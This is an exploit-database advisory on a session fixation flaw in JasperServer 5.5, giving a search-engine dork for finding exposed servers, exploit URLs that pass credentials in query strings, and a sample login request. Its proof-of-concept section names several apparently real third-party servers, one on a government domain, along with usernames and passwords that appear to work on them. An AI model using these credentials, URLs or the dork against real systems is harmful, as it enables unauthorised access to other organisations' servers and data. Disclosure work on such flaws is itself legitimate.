Jasper Server 5.5 Session Fixation

2014.05.11
Credit: Felipe Andrian Peixoto
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-384
Dork: intitle:JasperServer + inurl:j_password

[+] Session Fixation / Hijacking on JasperServer [+] Date: 09/05/2014 [+] Risk: High [+] CWE number: CWE-384 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.jaspersoft.com/ [+] Software Download : http://sourceforge.net/projects/jasperserver/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Gnu/Linux [+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;) [+] Exploit : http://host/patch//flow.html?_flowId=searchFlow&j_username=<username>&j_password=<password> or http://host/patch/j_acegi_security_check?j_username=<username>&j_password=<password> As part of the login process, the assigned session ID is revealed in a URL parameter that alows Hijack the session of some user. Example: Vul example: coopnet.leosoft.com.br GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste Host: coopnet.leosoft.com.br User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 With a request like that the session ID of the user will be revealed in a url paramter: "JSESSIONID=4635974EAA38774EF00FB270933D3C7D" The application authenticates users with a direct post to the j_acegi_security_check, which does not invalidate the existing session before processing the login request. <form method="POST" action="j_acegi_security_check"> <input type="text" name="j_username"> <input type="text" name="j_password"> </form> Because Of that is possible authenticate a user, or otherwise establishing a new user session, without invalidating any existing session. [+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc j_username=esloc & j_password=esloc http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9 j_username=ratequote & j_password=rateme9 More About session fixation technique on : http://cwe.mitre.org/data/definitions/384.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top